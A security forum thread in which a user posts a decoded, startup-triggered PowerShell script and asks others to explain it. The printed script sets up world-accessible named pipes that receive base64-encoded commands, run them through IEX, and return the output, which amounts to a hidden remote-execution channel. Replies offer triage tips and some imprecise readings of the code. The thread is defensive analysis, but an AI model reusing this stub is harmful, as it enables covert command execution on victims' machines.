Jump to content
Sign in to follow this  
NotAdmin

Powershell code analysis - is this stuff safe?

Recommended Posts

Hi all,

 

i've detected an attempt to execute Powershell command on a machine and after have decoding it, i retrieved these commands:

 

$pn = "awkywlhbod"

$pm = "xnopgdzmw6"

$sb =

{

param ($pn, $pm)

add-Type -assembly "System.Core"

$ps = New-Object System.IO.Pipes.PipeSecurity

$ar = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )

$ps.AddAccessRule($ar)

$p = New-Object System.IO.Pipes.NamedPipeServerStream($pn,"InOut",100, "Byte", "None", 1024, 1024, $ps)

$p.WaitForConnection();

$pr = new-object System.IO.StreamReader($p)

$o = $pr.ReadLine()

$p.Dispose();

$pr.Dispose();

$s = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($o)) | out-string

$o = IEX $s |out-string

$ps = New-Object System.IO.Pipes.PipeSecurity

$ar = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )

$ps.AddAccessRule($ar)

$p = New-Object System.IO.Pipes.NamedPipeServerStream($pm,"InOut",100, "Byte", "None", 1024, 1024, $ps)

$p.WaitForConnection();

$pw = new-object System.IO.StreamWriter($p)

$pw.AutoFlush = $true

$pw.WriteLine($o);

$p.Dispose();

}

add-Type -assembly "System.Core"

$t = start-job -ScriptBlock $sb -ArgumentList @($pn, $pm)

$pl = new-object System.IO.Pipes.NamedPipeClientStream(".", $pn);

$pp = new-object System.IO.Pipes.NamedPipeClientStream(".", $pm);

Start-Sleep 600

$t.StopJob()

 

Is there anyone who can help me to understand what this stand for?

Thank you very much in advance!!

Share this post


Link to post
Share on other sites
Posted (edited)

I assume the code you posted was from a PowerShell script that attempted to run? If so, your first task is locating where that script is stored on your OS installation drive. 

The key to determining PowerShell malicious use is the context in which it is run. If it is spawned from an MS Office app; run from the shell of an existing app such as explorer.exe; or spawned as a child process from cmd.exe or the other Win script engines, it can be deemed suspicious.

As far as the code itself, you need to find someone familiar with C# and PowerShell script code. My rough guess is it appears to be loading a PowerShell assembly . This coding "add-Type -assembly "System.Core"  indicates it is using PowerShell v2 which is not the default unless Win 7 or 2008 R2 is running. Again, I am not a C# or PowerShell script code expert.

-EDIT- Also the majority of malicious PowerShell scripts are packed, encrypted, and obfuscated to avoid detection upon download and execution.

All the above said, I monitor PowerShell execution with an Eset HIPS rule and that rule has never been triggered to date.

Edited by itman

Share this post


Link to post
Share on other sites

Hi itman, 

I tried to locate the script but Powershell came from cmd.exe (we are talking about a Win7 environment) and no other parent processes were found. 

This process (cmd.exe, that execute powershell.exe) was triggered 5-6 times at system startup, without any particular "pattern" (it seems a random process): just to say, powershell execution detected on Monday, and then another event 4 day later, another after 7, and so on. 

The event viewer didn't record any particular event in these specific timeframes. 

N.B.: the powershell script was obfuscated, i decoded it and what i pasted it's the clear text command. 

Many many thanks! 

 

Share this post


Link to post
Share on other sites
1 hour ago, NotAdmin said:

I tried to locate the script but Powershell came from cmd.exe (we are talking about a Win7 environment) and no other parent processes were found. 

N.B.: the powershell script was obfuscated, i decoded it and what i pasted it's the clear text command. 

I am a bit confused. You would have had to locate the script to decode - correct? Or, you found the .bat script that is executing the PowerShell script?

In an case, since the PowerShell script is starting at boot time and is at least obfuscated, that would make it at least in the suspicious category. Also the fact that the PowerShell script is being executed via cmd.exe which is a common malware technique.

For starters, I would submit the .bat script to VirusTotal to see if it detects anything.  What bothers me is this code:

$pn = "awkywlhbod"

$pm = "xnopgdzmw6"

I swear I have seen references to those names before but a Google search comes up empty. If VT shows no detections, I would submit the .bat script to Eset for analysis. Based on this GitHub code reference: https://github.com/nettitude/PoshC2/blob/master/Modules/NamedPipeProxy.ps1 , this reference - $pw = new-object System.IO.StreamWriter($p) - from the code you posted indicates some type of proxy server is being established which is not a good thing.

Share this post


Link to post
Share on other sites

Apologize me if i was not clear, I try to explain better the point. 

I received an alert of suspicious Powershell execution at a certain time and related obfuscated command was retrieved by the antimalware (in other words, i know what was executed, but i've to understand why). So, after analysis i saw that Powershell was triggered by cmd.exe but no other parent processes were found because this happened at system startup and i do not have other elements to continue the investigation (i'm thinking that something in autoexec has been compromised). 

In the meantime, i tried to deobfuscate the Powershell script (base64 encoded) and i finally managed the attached commands. 

At the moment i know what, when, who, where, how... I need to understand why! :)  

Share this post


Link to post
Share on other sites
32 minutes ago, NotAdmin said:

So, after analysis i saw that Powershell was triggered by cmd.exe but no other parent processes were found because this happened at system startup and i do not have other elements to continue the investigation (i'm thinking that something in autoexec has been compromised). 

Eset has an advanced HIPS setting that if enabled will monitor all system startup activity. Note that you will get numerous alerts when this setting is enabled. Also I am not 100% sure what it will show; hopefully what is starting the .bat script at boot time which might just be winlogon.exe which won't help much. This is why I suggested the Microsoft/SysInternals Autoruns product which is free and can be downloaded here:  https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns . Just be careful using it since it can bork your OS.

Share this post


Link to post
Share on other sites

Yes i already used Autoruns to check for rubbish running at startup but i didn't find any suspicious activity/process. 

It's really strange...  

Share this post


Link to post
Share on other sites

By the way, you are an Eset user? 

Share this post


Link to post
Share on other sites

Not a malware writer, just a powershell guy, but.. the line you reference $pw = new-object System.IO.StreamWriter($p) is just writing information (Actually one of the faster, if not fastest ways to write to a file in PS), the $p = New-Object System.IO.Pipes.NamedPipeServerStream($pn,"InOut",100, "Byte", "None", 1024, 1024, $ps) line, and the others referencing System.IO.Pipes refer to making a pipe connection to another system which would be concerning.

Doubt it's immediately helpful, but may assist when looking at other PS scripts for malicious intent.

 

Jdashn

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×